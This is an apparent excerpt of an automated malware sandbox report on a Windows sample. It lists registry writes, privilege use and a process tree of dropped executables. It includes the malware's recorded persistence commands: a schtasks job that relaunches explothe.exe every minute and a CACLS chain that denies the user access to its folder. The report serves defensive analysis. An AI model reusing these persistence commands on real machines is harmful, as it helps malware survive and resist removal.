| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2891 = "Sudan Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\6863.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\6fff71e22472096a9504705dd57be5306efe418a44897afce0875aba7822a72f.exe
"C:\Users\Admin\AppData\Local\Temp\6fff71e22472096a9504705dd57be5306efe418a44897afce0875aba7822a72f.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\4532.exe
C:\Users\Admin\AppData\Local\Temp\4532.exe
C:\Users\Admin\AppData\Local\Temp\45DF.exe
C:\Users\Admin\AppData\Local\Temp\45DF.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\46CA.bat" "
C:\Users\Admin\AppData\Local\Temp\4796.exe
C:\Users\Admin\AppData\Local\Temp\4796.exe
C:\Users\Admin\AppData\Local\Temp\4853.exe
C:\Users\Admin\AppData\Local\Temp\4853.exe
C:\Users\Admin\AppData\Local\Temp\494E.exe
C:\Users\Admin\AppData\Local\Temp\494E.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ML5UJ9UF.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ML5UJ9UF.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Users\Admin\AppData\Local\Temp\4A49.exe
C:\Users\Admin\AppData\Local\Temp\4A49.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SB7jI9jw.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SB7jI9jw.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rL2Jv7vH.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rL2Jv7vH.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff8e9b046f8,0x7ff8e9b04708,0x7ff8e9b04718
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iU3eD1eN.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iU3eD1eN.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fz10YT6.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fz10YT6.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff8e9b046f8,0x7ff8e9b04708,0x7ff8e9b04718
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
C:\Users\Admin\AppData\Local\Temp\65B1.exe
C:\Users\Admin\AppData\Local\Temp\65B1.exe
C:\Users\Admin\AppData\Local\Temp\671A.exe
C:\Users\Admin\AppData\Local\Temp\671A.exe
C:\Users\Admin\AppData\Local\Temp\6863.exe
C:\Users\Admin\AppData\Local\Temp\6863.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
